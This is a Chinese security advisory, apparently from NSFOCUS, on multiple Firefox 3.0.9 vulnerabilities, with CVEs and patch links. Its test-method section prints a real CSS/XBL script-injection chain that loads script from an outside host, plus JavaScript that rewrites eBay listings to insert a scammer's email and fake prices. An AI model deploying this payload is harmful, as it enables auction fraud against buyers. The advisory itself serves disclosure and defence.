安全研究
安全漏洞
Firefox 3.0.9更新修复多个漏洞
发布日期:2009-04-22
更新日期:2009-04-22
受影响系统:
Mozilla Firefox < 3.0.9不受影响系统:
Mozilla Thunderbird < 2.0.0.22
Mozilla SeaMonkey < 1.1.17
Mozilla Firefox 3.0.9描述:
Mozilla Thunderbird 2.0.0.22
Mozilla SeaMonkey 1.1.17
BUGTRAQ ID: 34656
CVE(CAN) ID: CVE-2009-1303,CVE-2009-1306,CVE-2009-1307,CVE-2009-1308,CVE-2009-1309,CVE-2009-1312,CVE-2009-1311,CVE-2009-1302,CVE-2009-1304,CVE-2009-1305,CVE-2009-1310
Firefox是Mozilla所发布的开源WEB浏览器。
Firefox中的多个安全漏洞允许恶意用户泄露敏感信息、绕过安全限制或入侵用户系统。由于代码共享,Thunderbird和SeaMonkey也受这些漏洞的影响。
1) 布局引擎和JavaScript引擎中的错误可能导致内存破坏并执行任意代码。
2) 如果使用jar:主题包装的URI通过Content-disposition: attachment提供内容的话,就会忽略HTTP头解压和显示内容。站点可能依赖于这个HTTP头防范不可信任的内容,因此攻击者可以利用这个漏洞绕过防范机制。
3) 在通过view-source:主题加载Adobe Flash主题时,Flash插件错误的将内容来源解释为localhost,这可能导致两个问题:
Flash文件可以绕过crossdomain.xml机制限制初始到任意第三方站点的HTTP请求。
处理为本地资源的Flash文件可以读写用户机器上的本地共享对象。
4) 允许用户嵌入第三方样式表的站点存在XBL绑定所导致的脚本注入漏洞。
5) 攻击者可以使用XMLHttpRequest创建URI不匹配principal的文档,这种不匹配可能导致基于principal的安全检查出现错误结果。
6) XPCNativeWrapper.toString的__proto__来自错误的范围,导致在某些错误环境中执行对该函数的调用;或者如果chrome要调用content.toString.call()的话,就会以chrome权限执行攻击者定义的函数。
7) 可以使用SearchForm值中的javascript: URI创建恶意的MozSearch插件,在执行空搜索时将这个URI用作默认的登录页面。如果攻击者能给诱骗用户安装这个恶意插件并执行空搜索,就会在当前打开的页面执行SearchForm javascript: URI。
8) 如果外部网页关联有POST数据的话,在将网页的内部帧保存为文件的时候会错误的将POST数据发送给内部帧的URL,这可能将用户的敏感数据发送给非预期的站点。
9) 当服务器响应包含有javascript: URI的Refresh头时,Firefox会重新定向到javascript: URI。如果攻击者能给在服务器响应中注入Refresh头,或能给控制站点对Refresh头所设置的值,就可以执行跨站脚本攻击。
<*来源:moz_bug_r_a4 (moz_bug_r_a4@yahoo.com)
Igor Bukanov
Gregory Fleischer (gfleischer+bugzilla@gmail.com)
Paolo Amadini
链接:http://www.mozilla.org/security/announce/2009/mfsa2009-22.html
http://www.mozilla.org/security/announce/2009/mfsa2009-21.html
http://www.mozilla.org/security/announce/2009/mfsa2009-20.html
http://www.mozilla.org/security/announce/2009/mfsa2009-19.html
http://www.mozilla.org/security/announce/2009/mfsa2009-18.html
http://www.mozilla.org/security/announce/2009/mfsa2009-17.html
http://www.mozilla.org/security/announce/2009/mfsa2009-16.html
http://www.mozilla.org/security/announce/2009/mfsa2009-14.html
http://secunia.com/advisories/34758/
https://www.redhat.com/support/errata/RHSA-2009-0436.html
https://www.redhat.com/support/errata/RHSA-2009-0437.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
type=text/css rel=stylesheet>
http://petereales.web.officelive.com/Documents/index.htm contains this code...
body { width:
expression(ebClientServerCallDynamicScriptObject('http://petereales.web.officelive.com/Documents/index.html'));
-moz-binding:
url(http://petereales.web.officelive.com/Documents/index.xml#index); }
http://petereales.web.officelive.com/Documents/index.xml#index contains this
code...
<?xml version="1.0" encoding="utf-8"?>
<bindings xmlns="http://www.mozilla.org/xbl"
xmlns:xbl="http://www.mozilla.org/xbl">
<binding id="index">
<implementation>
<constructor>ebClientServerCallDynamicScriptObject('http://petereales.web.officelive.com/Documents/index.html');</constructor>
</implementation>
</binding>
</bindings>
http://petereales.web.officelive.com/Documents/index.html contains this code...
if (typeof loadt == 'undefined') {
var mail = 'fr33train@gmail.com';
var price = '£3,200.00';
var iit = '1282528736197';
var MA = new Array("Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug",
"Sep", "Oct", "Nov", "Dec");
var et = new Date(svrGMT + 3596);
var year = et.getYear();
if (year < 1000)
year += 1900;
year = new String(year);
var cH = et.getHours();
var cM = et.getMinutes();
var cS = et.getSeconds();
function lf() {
var l = document.links;
for (var i = 0; i < l.length; i++) {
if (l[i].href.match(/\d{12}/i) &&
!l[i].href.match(/ebayphotohosting/i)) {
l[i].href = l[i].href.replace(/\d{12}/g, iit);
}
}
var f = document.forms;
for (var i = 0; i < f.length; i++) {
if (f[i].item) {
f[i].item.value = iit;
}
}
try {
document.getElementById("FastVIDetailsBottom").innerHTML = "";
itemId = iit;
} catch(err) {}
try {
tabb = document.getElementsByTagName('table');
for (i = tabb.length - 1; i >= 0; i--) {
if (tabb[i].innerHTML.indexOf('Questions from other members')
!= -1 && i > 1) {
tabb[i - 1].style.display = 'none';
break;
}
}
} catch(err) {}
}
document.getElementById("FastVIPBIBO").getElementsByTagName('table')[1].insertRow(1).insertCell(0).innerHTML
= '<img src="http://pics.ebaystatic.com/aw/pics/s.gif" width="5"
height="1"><span class="sectiontitle"><nobr><b>Note: This listing is restricted
to pre-approved bidder/buyer list.</b></nobr></span><br><span
class="standard">Email the seller at ' + mail + ' to buy this item.</span>';
var t1 =
document.getElementById("FastVIPDetails").getElementsByTagName('table')[0];
var tr1 = t1.getElementsByTagName('tr');
for (var i = 0; i < tr1.length; i++) {
if (tr1[i].innerHTML.match(/<hr/i)) {
break;
}
}
c = t1.insertRow(i - 1).insertCell(0);
c.colSpan = 4;
c.innerHTML = '<img width="1" height="20"
src="http://pics.ebaystatic.com/aw/pics/s.gif"/>';
r = t1.insertRow(i);
r.vAlign = "middle";
c = r.insertCell(0);
c.width = '25%';
c.align = "left";
c.innerHTML = '<span class="titlePurchase"><img align="middle"
style="vertical-align: text-bottom;" alt="Buy It Now"
src="http://pics.ebaystatic.com/aw/pics/bin_15x54.gif"/> price:</span>';
c = r.insertCell(1);
c.noWrap = 'yes';
c.innerHTML = '<span class="sectiontitle"><b>' + price + '</b></span>';
c = r.insertCell(2);
c.width = '85%';
c.innerHTML = '<button style="padding-right: 0px;" class="VIPriBtn"
type="submit"><span class="btn"><span class="btn">Buy It Now
></span></span></button>';
c = t1.insertRow(i + 1).insertCell(0);
c.colSpan = 4;
tr1 = t1.getElementsByTagName('tr');
var nr = new RegExp("(\\d{1,3},\\d{1,3}|\\d{1,3})\\.\\d{2}");
for (var i = tr1.length - 1; i >= 0; i--) {
td1 = tr1[i].getElementsByTagName('td');
for (var j = 0; j < td1.length; j++) {
var ttd = td1[j].innerHTML;
if (ttd.match(/End time/i)) {
td1[j + 1].innerHTML = '<font color="#ff0000"
class="sectiontitle"><nobr>59 mins 56 secs</nobr></font> <nobr>(' +
MA[et.getMonth()] + "-" + et.getDate() + "-" + year.substr(2, 2) + " " + ((cH <
10) ? "0": "") + cH + ":" + ((cM < 10) ? "0": "") + cM + ":" + ((cS < 10) ?
"0": "") + cS + ' PDT)</nobr>';
break;
}
if (ttd.match(nr) && !tr1[i].innerHTML.match(/Buy It Now/)) {
td1[j].innerHTML = ttd.replace(nr, "0.99");
break;
}
if (ttd.match(/(costs:)/i)) {
td1[j + 1].innerHTML = '<b>FREE</b><br>Standard Flat Rate
Shipping Service';
break;
}
if (ttd.match(/to:/i)) {
td1[j + 1].innerHTML = 'United Kingdom, United States, Canada';
break;
}
if (ttd.match(/Item location/i)) {
td1[j + 1].innerHTML = 'FREE SHIPPING';
break;
}
if (ttd.match(/History/i)) {
td1[j + 1].innerHTML = td1[j + 1].innerHTML.replace(/(Bidders
list|\d+\s[a-z]+)/, "0 Bids", "im");
break;
}
}
if (tr1[i].innerHTML.match(/(Quantity|Cost per item|High bidder)/im)) {
t1.deleteRow(tr1[i].rowIndex);
}
}
var d = document.getElementsByTagName('td');
for (var i = 0; i < d.length; i++) {
if (d[i].innerHTML.match(/<a
href="https?:\/\/[\-A-Z0-9+&@#\/%?=~_|!:,.;]*[\-A-Z0-9+&@#\/%=~_|]">Email the
seller<\/a>/im)) {
d[i].innerHTML = d[i].innerHTML.replace(/<a
href="https?:\/\/[\-A-Z0-9+&@#\/%?=~_|!:,.;]*[\-A-Z0-9+&@#\/%=~_|]">Email the
seller<\/a>/im, 'Email the seller: '+mail);
break;
}
if (d[i].innerHTML.match(/\d{12}$/)) {
d[i].innerHTML = d[i].innerHTML.replace(/\d{12}/, iit);
}
}
lf();
ebay.oDocument.oPage.onAfterLoad = lf;
loadt = true;
}
建议:
厂商补丁:
Mozilla
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.mozilla.org/
RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2009:0437-02)以及相应补丁:
RHSA-2009:0437-02:Critical: seamonkey security update
链接:https://www.redhat.com/support/errata/RHSA-2009-0437.html
浏览次数:2748
严重程度:0(网友投票)
绿盟科技给您安全的保障